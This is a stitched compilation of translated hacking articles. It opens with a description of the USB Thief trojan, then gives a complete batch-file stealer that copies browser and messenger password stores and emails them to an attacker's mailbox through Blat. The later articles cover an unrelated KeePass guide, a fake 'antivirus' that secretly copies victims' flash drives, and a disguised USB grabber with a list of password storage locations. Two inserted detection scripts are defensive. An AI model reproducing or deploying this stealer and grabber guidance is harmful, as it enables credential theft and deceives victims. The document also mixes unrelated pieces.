An extremely unusual Trojan: the malware was named USB Thief (Win32/PSW.Stealer.NAI). It is focused on stealing data, it spreads and runs from ordinary flash drives, and it skilfully hides the traces of its presence on the system. The Trojan is well suited to cyber espionage, since it can reach even systems that are isolated from the network, provided a USB drive can be connected to them.

Unlike other USB threats, which rely on autorun or forged application shortcuts to get the malware started, USB Thief works differently. The Trojan takes advantage of the fact that users often keep portable versions of applications such as Firefox, Notepad++ and TrueCrypt on flash drives. The malware inserts itself neatly into the load chain of such programs, posing as a plugin or DLL file. Thus, when the user launches a familiar application from the flash drive, the Trojan launches along with it, in the background.

The malware's unknown author built serious protection into it. USB Thief is bound to each infected flash drive through the drive's unique ID and parameters. Some of the Trojan's files are protected with AES-128 encryption, and the key is derived from the unique parameters of the device. The names of the malware's files also differ from copy to copy: they are generated from the contents of the flash drive and the creation times of the files. If USB Thief is copied to another flash drive or to an ordinary hard disk, this two-stage protection stops the malware from working and seriously complicates reverse engineering.

Trojan structure

USB Thief runs directly from the flash drive and leaves no traces on the system itself. The Trojan consists of six files: four executables and two configuration files. The first loader is responsible for starting the Trojan together with the portable program. It checks the USB device and makes sure it can write the stolen information to it and keep it there. Then the second loader starts; it checks the names of its parent processes to make sure it is running in a normal environment (and that nobody is trying to analyse it). The third loader, in turn, checks the system for antiviruses.

The last, fourth stage, the payload, is injected into a running process and does the actual data theft. USB Thief steals documents, images, lists of files from all available drives, Windows Registry data and information collected by WinAudit. All stolen data is stored on the flash drive, encrypted with elliptic-curve cryptography.

ESET experts note that attacks using USB Thief are not yet common. The Trojan is nonetheless very dangerous, since its presence is hard to detect and, once the USB drive is removed, no trace of the theft remains at all. The company's report also states that the malware's author could, if desired, repurpose the malware by replacing the data-theft payload with any other malware.

In this article I will describe how to quickly and without much difficulty write and build a virus that steals files containing passwords and sends them all to a mailbox.
Let's start with the fact that the virus will be written as a .bat file (CMD; you can use the basic commands), that is, in an ordinary text file, and will be executed by the standard, built-in Windows interpreter, the command line.
To write such a virus, you need to know the exact storage locations of the files it will steal, the Blat components, which can be downloaded from the official site http://www.blat.net/ or from our server, and the Rar.exe component of the WinRAR archiver (you can do without it).
Open Notepad and copy the following code into it:

@echo off
md %systemroot%\wincs
md %SystemDrive%\pass\
md %SystemDrive%\pass\opera\
md %SystemDrive%\pass\Mozilla\
md %SystemDrive%\pass\MailAgent\
md %SystemDrive%\pass\MailAgent\reg
attrib %systemroot%\wincs +h +s +r
attrib %SystemDrive%\pass +h +s +r
copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe"
copy /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll"
copy /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib"
CD /D %APPDATA%\Opera\Opera\
copy /y wand.dat %SystemDrive%\pass\opera\wand.dat
copy /y cookies4.dat %SystemDrive%\pass\opera\cookies4.dat
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2"
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3"
CD /D %APPDATA%
Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul
Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul
cd %AppData%\Mozilla\Firefox\Profiles\*.default\
copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite
copy /y key3.db %SystemDrive%\pass\Mozilla\key3.db
copy /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite
copy /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul
del /s /q %SystemRoot%\Rar.exe
%SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\
copy /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar
cd %systemroot%\wincs
%systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Password
ren *.rar pass.rar
%systemroot%\wincs\blat.exe -body FilesPassword -to [email protected] -attach %systemroot%\wincs\pass.rar
rmdir /s /q %SystemDrive%\pass
rmdir /s /q %systemroot%\wincs
del /s /q %systemroot%\blat.exe
del /s /q %systemroot%\blat.dll
del /s /q %systemroot%\blat.lib
attrib +a +s +h +r %systemroot%\wind.exe
EXIT
cls

I won't go into much detail about the code of the batch file itself.
@echo off - hides the body of the batch file (not really needed, but still).
md %systemroot%\wincs - creates a wincs folder inside the Windows system folder, whatever drive it is installed on and whatever it is called.
md %SystemDrive%\pass\ - creates a pass folder on the drive where Windows is installed.
md %SystemDrive%\pass\opera\ - creates the opera folder, into which wand.dat and cookies4.dat from the Opera browser will be copied (up to the 11.x versions, Opera stores its passwords in the wand.dat file).
md %SystemDrive%\pass\Mozilla\ - creates a Mozilla folder for the files from the Mozilla browser (cookies.sqlite, key3.db, signons.sqlite) in which passwords are stored.
md %SystemDrive%\pass\MailAgent\ - creates a MailAgent folder into which the files containing the correspondence history and the registry keys (which store passwords) from Mail.Ru Agent will be copied.
md %SystemDrive%\pass\MailAgent\reg - creates the reg folder.
attrib %systemroot%\wincs +h +s +r - sets attributes on the wincs folder, thereby hiding it from view.
attrib %SystemDrive%\pass +h +s +r - the same as above.
copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe" - copies the blat.exe file from the download location to the wincs folder.
copy /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll" - copies the blat.dll file from the download location to the wincs folder.
copy /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib" - copies the blat.lib file from the download location to the wincs folder.
CD /D %APPDATA%\Opera\Opera\ - changes to the Opera folder where the files with passwords (and not only those) from Opera are located.
copy /y wand.dat %SystemDrive%\pass\opera\wand.dat - copies the wand.dat file to the opera folder.
copy /y cookies4.dat %SystemDrive%\pass\opera\cookies4.dat - copies the cookies4.dat file to the opera folder.
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2" - exports the magent_logins2 registry key, where the password is stored, to the reg folder.
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3" - exports the magent_logins3 registry key, where the password is stored, to the reg folder.
CD /D %APPDATA% - changes to the AppData folder.
Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul - copies the contents of the Mra\Base folder to the MailAgent folder.
Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul - copies the ver.txt file to the MailAgent folder.
cd %AppData%\Mozilla\Firefox\Profiles\*.default\ - changes to the Mozilla browser profile folder.
copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite - copies the cookies.sqlite file to the Mozilla folder.
copy /y key3.db %SystemDrive%\pass\Mozilla\key3.db - copies the key3.db file to the Mozilla folder.
copy /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite - copies the signons.sqlite file to the Mozilla folder.
copy /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul - copies the WinRAR Rar.exe archiver component to the pass folder.
del /s /q %SystemRoot%\Rar.exe - removes the archiver component from the Windows folder.
%SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\ - archives the contents of the pass folder.
copy /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar - copies the created archive to the wincs folder.
cd %systemroot%\wincs - changes to the wincs folder.
%systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Password - sets up the Blat program to send the archive by specifying the authorisation data and the sending details. Don't forget to specify your own details for the mailbox from which the letter with the archive will be sent.
ren *.rar pass.rar - just in case the archive got the wrong name along the way, we rename it to pass.rar again.
%systemroot%\wincs\blat.exe -body FilesPassword -to [email protected] -attach %systemroot%\wincs\pass.rar - specifies the mail address the letter will be sent to and sends it.
rmdir /s /q %SystemDrive%\pass - deletes the pass folder.
rmdir /s /q %systemroot%\wincs - deletes the wincs folder.
del /s /q %systemroot%\blat.exe
del /s /q %systemroot%\blat.dll
del /s /q %systemroot%\blat.lib - these three lines remove the Blat components from the Windows folder.
attrib +a +s +h +r %systemroot%\wind.exe - sets attributes on our own executable, thereby hiding it from view.
EXIT - ends the batch file's process and exits.
cls - clears any output lines in the interpreter.
Once copied, save it as wind.bat and compile it to an .exe with a Bat-to-Exe converter; then gather everything together, that is, take the Blat program components and the WinRAR archiver component (you can download it) and glue them into one executable file with some program; the path to which all the files are unpacked should be %SystemRoot%, %WindowsDir% or %windir%.
As a result, we get a virus that will not be flagged by antiviruses and will send an archive with the files to your mail. The files that arrive in the mail can be decrypted using Multi Password Recovery, though not all of them: only wand.dat from Opera, and then only if it was not updated to the 11.x versions. All the other files can be used by putting them in place of your own.
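From the defender's side, the walkthrough above is also a list of indicators: Blat being configured and then sending a .rar attachment from the hidden wincs folder, regedit exporting the Mail.Ru Agent login keys, rar.exe archiving the pass staging folder, and attrib hiding the staging folders. The following is an added example, not part of the original article: a small Python scanner that runs those indicators over constructed Sysmon-style process-creation events (the hostnames, addresses and paths in the sample events are placeholders I made up).

```python
"""Scan process-creation telemetry for the batch stealer's behaviour chain.

Added example, not part of the original article. Events are constructed
Sysmon-style records (parent image, image, command line); the hostnames,
mail addresses and paths in them are placeholders.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


# (rule name, regex on the image basename, regex on the command line).
# Each rule mirrors one step the walkthrough above describes.
RULES = [
    ("blat_smtp_config", r"^blat\.exe$",
     r"-install\s+-server\s+\S+.*-pw\s+\S+"),          # blat.exe -install ... -pw
    ("blat_send_attachment", r"^blat\.exe$",
     r"-attach\s+\S*\.rar\b"),                          # blat.exe ... -attach *.rar
    ("mailru_agent_login_export", r"^regedit\.exe$",
     r"-ea\s+.*Mail\.Ru\\Agent\\magent_logins"),        # regedit -ea ... magent_logins*
    ("staging_archive", r"rar\.exe$",
     r"\ba\s+-r\s+\S*\\pass\\pass\.rar"),               # rar.exe a -r ...\pass\pass.rar
    ("hide_staging_folder", r"^attrib\.exe$",
     r"(?=.*\+h)(?=.*\+s).*\\(wincs|pass)\b"),          # attrib +h +s on a staging folder
]


def basename(path):
    """Last component of a Windows path (os.path would not split backslashes on POSIX)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def scan(events):
    """Return (rule name, image) for every event matching a rule, in event order."""
    hits = []
    for ev in events:
        name = basename(ev.image)
        for rule, img_re, cmd_re in RULES:
            if re.search(img_re, name, re.I) and re.search(cmd_re, ev.command_line, re.I):
                hits.append((rule, ev.image))
    return hits


def triage(events):
    """Collapse hits into a verdict. A lone hit (e.g. attrib +h +s) is noisy by itself;
    the stealer is characterised by staging *and* SMTP exfiltration together."""
    rules = {rule for rule, _ in scan(events)}
    staging = {"mailru_agent_login_export", "staging_archive", "hide_staging_folder"}
    if "blat_send_attachment" in rules and rules & staging:
        return "high"
    if rules:
        return "medium"
    return "none"


# Constructed sample telemetry: the chain the batch file produces, plus one benign
# archiver run to show that rar activity on its own is not flagged.
SAMPLE_EVENTS = [
    ProcEvent("C:\\Windows\\explorer.exe", "C:\\Windows\\wind.exe",
              "\"C:\\Windows\\wind.exe\""),
    ProcEvent("C:\\Windows\\wind.exe", "C:\\Windows\\System32\\attrib.exe",
              "attrib C:\\Windows\\wincs +h +s +r"),
    ProcEvent("C:\\Windows\\wind.exe", "C:\\Windows\\regedit.exe",
              "regedit.exe -ea C:\\pass\\MailAgent\\reg\\agent.reg "
              "\"HKEY_CURRENT_USER\\software\\Mail.Ru\\Agent\\magent_logins2\""),
    ProcEvent("C:\\Windows\\wind.exe", "C:\\pass\\rar.exe",
              "C:\\pass\\rar.exe a -r C:\\pass\\pass.rar C:\\pass\\"),
    ProcEvent("C:\\Windows\\wind.exe", "C:\\Windows\\wincs\\blat.exe",
              "C:\\Windows\\wincs\\blat.exe -install -server smtp.example.invalid "
              "-port 587 -f sender@example.invalid -u login -pw Password"),
    ProcEvent("C:\\Windows\\wind.exe", "C:\\Windows\\wincs\\blat.exe",
              "C:\\Windows\\wincs\\blat.exe -body FilesPassword -to drop@example.invalid "
              "-attach C:\\Windows\\wincs\\pass.rar"),
    ProcEvent("C:\\Windows\\explorer.exe", "C:\\Program Files\\WinRAR\\Rar.exe",
              "Rar.exe a -r D:\\backup\\docs.rar D:\\docs"),  # benign archiving
]


if __name__ == "__main__":
    for rule, image in scan(SAMPLE_EVENTS):
        print(f"{rule:28s} {image}")
    print("verdict:", triage(SAMPLE_EVENTS))
```

The parent-image field is kept in the record because, in real telemetry, the whole chain hanging off one unexpected executable in %SystemRoot% is itself the strongest signal.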
I think that's all; if you have any questions, feel free to ask.
Thank you for your attention, all the best!
©Swap TheHackWorld.in

Many companies, including Sony and Adobe, have already fallen victim to hackers who stole millions of passwords and other user data. Analysis of this information showed that users often use either weak passwords like "123456" or the same password for many services. This makes the hackers' task much easier, and at the same time such carelessness is understandable: who can remember more than a dozen complex passwords?

A simple solution could be a piece of paper taped under the keyboard. No hacker will be able to get at it, but you will have to keep a constant eye on the people near your computer. And that sheet is of no use if you want to log into your account from someone else's computer.

The free tool KeePass 2 Portable solves this dilemma. All it needs is a USB flash drive with 10 MB of free space, on which you install the helper program. From then on you only need to remember one password, for the protected area of the flash drive. That is where KeePass keeps the login data for your web services, as an encrypted database protected by a master password.

Password-stealing Trojans won't be able to sniff out anything. And since you no longer need to remember dozens of passwords, you can use a new, really strong password for each web service. Now we will tell you in detail how to use KeePass.

How to do it

1 Install a password safe

Insert a USB flash drive into the PC, create a new folder on it and copy the contents of the KeePass archive there. Run the KeePass.exe program. After launch, enable automatic update checking by clicking "Enable" in the pop-up window. Then choose "View | Change Language" and click "Get more languages".

Download the Russian language file from the site that opens by clicking on "Russian | 2.25+". Extract the contents of the archive to the USB drive. Click "View | Change Language" again, select "Russian" and restart KeePass by pressing the "Yes" button.

2 Create a new password database

Select "File | New" and specify the USB drive as the password storage. In the next window, the program will prompt you to set the main password. You will need to enter it every time you start KeePass.

3 Activate Protected Mode

To prevent a Trojan from reading your KeePass password, enter it using the program's protected mode, similar to UAC in Windows 7. To do this, in KeePass go to "Tools | Settings | Security", scroll to the very bottom of the window and check the box next to "Enter master password in secure mode".

4 Populate the database with passwords

KeePass can sort passwords into groups. By default, your new password bank has groups such as "OS" or "Internet". To create a new entry, select the appropriate group (or create a new one), right-click on the white area on the right and then click "Add Entry".

Fill in all fields and click OK. Since you no longer need to remember passwords to log in to each account, you can set up new, more complex ones that can be generated, for example, at passwort-generator.com.

5 Use automatic authorization

If you want to sign in to a service using KeePass, open the group where the corresponding password is stored. Right-click the corresponding entry in the KeePass password store and select "Start Autodial" from the drop-down list. The program will then transfer your data to the browser, which will open a new window where you are logged into your account.

Please note that in the "URL" field you must enter the URL that you usually enter in the browser for authorization, otherwise automatic password entry through KeePass will not work.

6 Extend KeePass

If you want to extend the functionality of KeePass, go to "Tools | Modules | More modules", after which you will be taken to the site with useful extensions (our recommendations can be found in the table below). Click on the plugin's name, download it and extract it to the flash drive.

Restart KeePass and navigate to Tools | Modules. A list of available plugins will be displayed at the bottom (some of them can be configured).

The Best Extensions for KeePass

Equip your password safe with additional features, for example a backup function or transferring passwords to a mobile phone.

Name            Description
DataBaseBackup  Safeguards the password database in case the USB drive is stolen or lost.
Twofish Cipher  Adds an encryption algorithm that is almost impossible to crack; note that it makes KeePass run slower.
KeeAgent
KeyExchanger
KeeForm         Opens your favourite sites with the click of a button and automatically fills in your login details.

For mere mortals, a flash drive is a device for carrying documents, films, photos and other personal (sometimes very personal) information. For hackers, a flash drive is both a victim and a weapon. Today I will tell you all the subtleties of quietly siphoning data from flash drives onto my computer, and I will also show you how to turn harmless flash drives into programs for backing up passwords from the "big" computer.

Trap for other people's flash drives

The idea of the "Evil Computer" program is as follows. We will develop a small tool that pretends to be a super-advanced antivirus whose purpose is to thoroughly remove "dangerous" viruses from flash drives. A virus-infected flash drive surprises no one these days, so our specialised "antivirus" will not alarm a gullible user. On the contrary, having inserted a flash drive into your computer and seen a message like "Virus detected. Performing a detailed scan of all files for infection", they will certainly wait for the operation to finish.

Instrument preparation

We will write this useful program in the now-fashionable C#. The flexibility of the language and the rich functionality of the .NET platform let you develop applications at lightning speed. That is exactly what we need: we are interested in the harvest we can reap, not in the tedious process of coding.

One of the important components of our application will be the interface. The more convincing you make it, the more likely the victim won't notice the catch and will calmly wait for the anti-virus scan to finish. I didn't bother too much and placed only a picture and a ProgressBar on the form of a blank project. You can go wild and make a mind-blowing design. I advise you to look at the design of some real antivirus and style your application in roughly the same way.

We set the task

We will assume that the organisational issues and the plan of action are settled; it's time to discuss the technical details. So, our antivirus should start its dirty work as soon as the flash drive is plugged in. Once a new disk appears in the system, our program must determine its letter and start copying.

Before I undertook to write this article, I came across the source code of a similar program. The author of that example detected the presence of a flash drive by periodically enumerating all disks looking for a drive of the "removable media" type. At first I thought of going the same way, but an inner voice told me it was wasteful. After weighing all the pros and cons, I discarded the idea and went for a walk through MSDN. Five minutes later it turned out I had done so for good reason. The answer was found!

You won't get anywhere without WinAPI...

The most effective way to learn about the connection of new hardware (in our case, flash drives) is to catch and analyse the WM_DEVICECHANGE message. When a device is installed, the message is sent to all top-level windows, and we can easily handle it in our application. To do that it is enough to write a WindowProc function. In practice it looks like this:

LRESULT CALLBACK WindowProc(
    HWND hwnd,      // window handle
    UINT uMsg,      // message id
    WPARAM wParam,  // event that occurred
    LPARAM lParam   // pointer to a structure with the event data
);

In the body of the function you need to compare the value of the wParam parameter with the IDs of the various events related to the WM_DEVICECHANGE message. For our example these are:

  • DBT_DEVICEARRIVAL - hardware has been added
  • DBT_DEVICEREMOVECOMPLETE - hardware has been completely removed

Okay, we know how to establish that new hardware has been connected, but how can we be sure that it was a flash drive? There are a lot of hot-pluggable (USB) devices: printers, scanners, modems, etc. Fortunately, this problem is solved quite simply. Through the lParam parameter we can access the _DEV_BROADCAST_HDR structure, which has a dbch_devicetype field, and draw the appropriate conclusions from its value. If it equals DBT_DEVTYP_VOLUME, it's time to rejoice and clap your hands: a flash drive has been connected!

typedef struct _DEV_BROADCAST_HDR {
    DWORD dbch_size;        // structure size
    DWORD dbch_devicetype;  // device type
    DWORD dbch_reserved;    // reserved, not used
} DEV_BROADCAST_HDR, *PDEV_BROADCAST_HDR;

A flash drive has been inserted into our PC; let's try to find out the drive letter the system assigned to it. As in "Field of Miracles", you could guess it, but it's better to pull the information out of the DEV_BROADCAST_VOLUME structure.

typedef struct _DEV_BROADCAST_VOLUME {
    DWORD dbcv_size;        // structure size
    DWORD dbcv_devicetype;  // device type
    DWORD dbcv_reserved;    // reserved
    DWORD dbcv_unitmask;    // drive letter bitmask
    WORD  dbcv_flags;       // flags
} DEV_BROADCAST_VOLUME, *PDEV_BROADCAST_VOLUME;

Of all the fields in this structure, we are interested in dbcv_unitmask. Note that this field holds only a bit for each letter, not its symbolic representation: if bit 0 is set, the drive letter is A; bit 1 means B, and so on. For convenience in obtaining the symbolic letter, it is best to write a function.
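An added example, not from the original article: decoding the lParam payload of WM_DEVICECHANGE in Python, the way a removable-media monitor would before logging or alerting on a volume arrival. The structure layouts and constants are the documented dbt.h ones (DBT_DEVICEARRIVAL, DBT_DEVTYP_VOLUME, DBTF_MEDIA, DBTF_NET); the buffers are constructed with struct.pack since there is no live window procedure here, and it also covers the case the text skips, a unitmask with several bits set (for example a multi-slot card reader).

```python
"""Decode the DEV_BROADCAST_* payload of a WM_DEVICECHANGE notification.

Added example, not code from the original article. Constants and layouts
are the documented Windows (dbt.h) ones; the buffers are constructed here
because the code runs outside a Windows message loop.
"""
import struct

# wParam event codes
DBT_DEVICEARRIVAL = 0x8000
DBT_DEVICEREMOVECOMPLETE = 0x8004
# dbch_devicetype value for logical volumes
DBT_DEVTYP_VOLUME = 0x00000002
# dbcv_flags bits
DBTF_MEDIA = 0x0001  # change affects the media in the drive, not the drive itself
DBTF_NET = 0x0002    # the logical volume is a network volume

HDR_FMT = "<III"         # dbch_size, dbch_devicetype, dbch_reserved
VOLUME_FMT = "<IIIIHxx"  # ... + dbcv_unitmask, dbcv_flags, 2 bytes of padding


def unitmask_to_letters(mask):
    """Bit n of dbcv_unitmask set means drive letter chr(ord('A') + n).
    Several bits may be set at once, so every letter is returned, A..Z order."""
    return [chr(ord("A") + n) for n in range(26) if mask & (1 << n)]


def decode_volume_event(wparam, lparam_bytes):
    """Describe a volume arrival/removal, or return None when the message is not
    about a logical volume (printers, ports, interfaces use other device types)."""
    if wparam not in (DBT_DEVICEARRIVAL, DBT_DEVICEREMOVECOMPLETE):
        return None
    if len(lparam_bytes) < struct.calcsize(HDR_FMT):
        raise ValueError("buffer shorter than DEV_BROADCAST_HDR")
    size, devtype, _reserved = struct.unpack_from(HDR_FMT, lparam_bytes)
    if devtype != DBT_DEVTYP_VOLUME:
        return None
    # Trust dbch_size before reading past the common header.
    if size < struct.calcsize(VOLUME_FMT) or len(lparam_bytes) < size:
        raise ValueError("dbcv_size inconsistent with DEV_BROADCAST_VOLUME")
    _, _, _, unitmask, flags = struct.unpack_from(VOLUME_FMT, lparam_bytes)
    return {
        "event": "arrival" if wparam == DBT_DEVICEARRIVAL else "removal",
        "letters": unitmask_to_letters(unitmask),
        "network": bool(flags & DBTF_NET),
        "media_only": bool(flags & DBTF_MEDIA),
    }


def make_volume_payload(unitmask, flags=0, devicetype=DBT_DEVTYP_VOLUME):
    """Constructed lParam buffer with the layout Windows would pass for a volume."""
    size = struct.calcsize(VOLUME_FMT)  # 20 bytes, as sizeof(DEV_BROADCAST_VOLUME)
    return struct.pack(VOLUME_FMT, size, devicetype, 0, unitmask, flags)


if __name__ == "__main__":
    # Constructed: a card reader exposing E: and F: at once, then a network share.
    print(decode_volume_event(DBT_DEVICEARRIVAL, make_volume_payload(0b110000)))
    print(decode_volume_event(DBT_DEVICEARRIVAL, make_volume_payload(1 << 25, DBTF_NET)))
```

A monitoring tool would log the returned letters together with the process that first touches the new volume; a non-network arrival followed by bulk reads of the drive is the pattern the copier described in this article produces.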

If you have been reading our column for a long time and are familiar with API functions, there is no need to read the next part of the article. Open the editor and start sculpting the application. I have described all the necessary structures and functions; you just have to put them together in a program. Make up your mind, and I will start diving into .NET and C# in particular.

Let's get to .NET

Time to start practising and apply the knowledge to C#. "What the heck?" you ask. "You talked about WinAPI for half the article, and now you've just decided to issue all the function calls as native code? Where is the promised lightning speed of development?"

You are partly right. Our application will indeed use WinAPI functions (there is no easier way), but we will not declare them ourselves. Many developers have faced the problem of detecting flash drives. As a result of those skirmishes, free C# classes appeared in which all the necessary functionality is already implemented. We just have to plug such a ready-made piece (read: component) into our project and call a couple of methods. We will use one of these classes now. But knowledge of the structures described above will certainly come in handy when porting this program to the raw Windows API.

There are a lot of ready-made classes that solve such problems, but I liked Jan Dolinay's version the most. He wrote a very easy-to-use and understandable DriveDetector class that can:

  • Determine that a flash drive has been connected
  • Detect a request to unmount a connected flash drive
  • Detect that the flash drive has been removed
  • Get the drive letter of a newly connected flash drive
  • Provide a list of files opened from the flash drive

And most importantly, this class is extremely easy to work with, as you will see now. Connecting the class to your project is done in the standard way, and there is no point dwelling on it. So let's move on to initialisation. It is done like this:

flashDriveDetector = new DriveDetector();
flashDriveDetector.DeviceArrived += new DriveDetectorEventHandler(OnDriveArrived);
flashDriveDetector.DeviceRemoved += new DriveDetectorEventHandler(OnDriveRemoved);

After instantiating an object of the DriveDetector class, I define the DeviceArrived and DeviceRemoved event handlers. It is not hard to guess from their names what they are responsible for. All the initialisation code is best written in the Form1() method. The main code of our program will be in the DeviceArrived event handler; its text is shown in the sidebar:

string dirName = Environment.GetCommandLineArgs() + "flash_" + DateTime.Now.ToString("dd-MM-yy-hh-mm-ss");
CreateDirectory(dirName);
xDirectory flashcopier = new xDirectory();
flashcopier.IndexComplete += new IndexCompleteEventHandler(IndexComplete);
flashcopier.ItemCopied += new ItemCopiedEventHandler(ItemCopied);
flashcopier.CopyComplete += new CopyCompleteEventHandler(CopyComplete);
flashcopier.Source = new DirectoryInfo(e.Drive.ToString());
flashcopier.Destination = new DirectoryInfo(dirName);
flashcopier.Overwrite = true;
flashcopier.FolderFilter = "*";
flashcopier.FileFilters.Add("*.doc");
flashcopier.FileFilters.Add("*.xls");
// Define other filters
// ....
flashcopier.StartCopy();

At the very beginning of the listing I define the path to the folder into which the contents of the flash drive will be copied. We copy into a "flash_<current date>" directory located next to the folder our application is launched from; that's more convenient. Having decided on a folder name, I try to create it with the CreateDirectory() function. I wrote this function purely for convenience: it creates an instance of the DirectoryInfo class, designed for working with directories, and calls its Create() method, which creates the new folder.

After creating the folder, we can copy. I copy all the files using an object of type xDirectory. If you type the code from the listing yourself, the compiler will generate an error on compilation saying in black and white: "An object of this type was not found."

The point is that xDirectory is a third-party class. I found it on the Internet once, and since then I often use it in my projects. I like it because one method call is enough to copy subfolders as well. In addition, it allows you to set filters.

You can really do without it: take the standard classes, a technique well known to all programmers (recursion) and write a couple of dozen lines of code. Alas, I absolutely don't want to. It's the 21st century; we need to optimise our actions to the maximum, and xDirectory will help us with that.

The module with the class is on our disk, and you can find out the purpose of its methods, properties and events from the corresponding table.

Properties of the xDirectory class

Methods of the xDirectory class

Try running our application and inserting a flash drive. After a few seconds (depending on how cluttered your flash drive is), the entire contents of the USB drive will be transferred to the folder from which you launched the freshly baked application.

USB grabber

Now let's consider the inverse problem and talk about the nuances of creating the so-called flash drive grabber. The principle is exactly the same: you need to write a simple application that will run automatically after the flash drive is plugged in.

While running, the application walks the folders and registry keys in which popular programs store saved passwords and, where possible, copies all the information into one of its own folders. So that your autorun doesn't arouse suspicion in the poor user, take the trouble to disguise it carefully; for example, as a launch menu.

You are probably aware that so-called portable versions of applications, programs that run directly from a flash drive, have become very popular. This is the best disguise to play on. Design the program in the appropriate style and, for plausibility, add a few buttons that launch some programs. My design is shown in the picture.

How are we going to rob?

I must say right away that no super-hacker actions are needed here. Most programs store personal data in the Documents and Settings\User\Application Data\%ProgramName% folder or in the registry, where ProgramName stands for any program. In the first case you use the already familiar xDirectory class (or the standard methods for working with files) and copy everything you need with it. In the second case you have to work with the registry. I won't give an example of copying files (we've already covered it), but I'll show how to interact with the registry using .NET (using the example of determining the path to the TC folder):

RegistryKey readKey = Registry.CurrentUser.OpenSubKey("Software\\Ghisler\\Total Commander");
string key = (string)readKey.GetValue("InstallDir");

That's all; there will be no more code. This knowledge should be enough for you to pull files with valuable information. To make things a little easier, I have prepared a list of the most popular programs and described all the places where they store saved user data.

Mail Agent

The messenger from Mail.ru is now very popular among ordinary users (especially among women). The goals are clear, the tasks are set, so we are interested in:

  • History. MA stores the entire history of the user's correspondence in Documents and Settings\%User%\Application Data\Mra\base. In the base folder there is a file mra.dbs; this is, in fact, the history file.
  • Contact list. The contact list is located in the MRA\%user account%\clist5.txt folder. Keep in mind that several users may work with Mail.Agent (or one user may have several accounts), so the most reasonable approach is to copy all folders whose name contains the "@" symbol.
  • Password. The password (more precisely, its hash) for the user's account is located in the registry under HKCU\Software\Mail.RU\Agent\magent_logins2\%Account%, in the ####password parameter.

gTalk

Google creates convenient and functional products, among them a Jabber client, gTalk. gTalk is not very popular yet; it is not installed on every second PC, but it does turn up sometimes, and to be on the safe side it's better to teach our program straight away to get passwords from this messenger too. Passwords for all gTalk accounts are stored in the registry under HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts. This branch lists all accounts that have ever signed in to gTalk. Account passwords are stored in the string parameter pw.

Total Commander

Total Commander is by far the most popular file manager. The program contains a ton of features (and as many again can be bolted on with additional plugins). We are only interested in the built-in FTP client. Many use it, and passwords, of course, get saved.

TC, unlike many other programs, does not store passwords in the registry but uses good old ini files. Passwords, as well as all the data needed to connect to the servers (IP, port, username, etc.), Total Commander stores in the file wcx_ftp.ini, which sits innocently in the program folder. The path to the directory where Total Commander is installed can be found from the registry; look in the HKEY_CURRENT_USER\Software\Ghisler\Total Commander branch.

Firefox

Today a browser is not just a program for web surfing but a whole combine harvester that, in addition to its various features, stores a lot of confidential information. A typical example is web forms. 99% of modern sites require registration. Remembering and constantly keeping in mind the login/password combination for each site is unrealistic, especially if you are an advanced user and your Internet surfing is not limited to Odnoklassniki and VKontakte alone.

The developers made life easier for users and built so-called "password vaults" into the programs. You registered, logged in under your account, told the browser to remember the credentials, and forgot about it. On your next visit only a couple of mouse clicks remain, and you are already on the site. Since the browser saves passwords, we have the opportunity to steal its entire database.

  • sessionstore.js - the file contains all saved sessions.
  • signons3.txt - encrypted passwords (for the third version of FF).
  • signons.sqlite - SQLite database containing all encrypted passwords.
  • key3.db - database containing the keys for certificates.

All these files are located in the familiar Documents and Settings\%UserName%\Application Data\Mozilla\Firefox\Profiles\%ProfileName%.

Opera

Opera is a browser very popular among Russian users. Naturally, we cannot leave it unattended. With Opera the situation is about the same as with Firefox. All passwords saved in the browser are stored in Documents and Settings\%UserName%\Application Data\Opera\profile in the wand.dat file. So when Opera is detected, we act in the same way as with Firefox.

Skype

Skype's popularity grows every day. Many use it not as a means of making calls but for plain convenient chat. All confidential data, as expected, is located in the user profile (in the same place where Opera or FF keep theirs). To "privatise" it, you have to copy the user profile from Documents and Settings\%userName%\Application Data\Skype\ and export the registry branch HKEY_CURRENT_USER\Software\Skype\ProtectedStorage.

QIP

Like most of the programs described earlier, QIP stores all saved passwords in Application Data\qip.

Copying completed

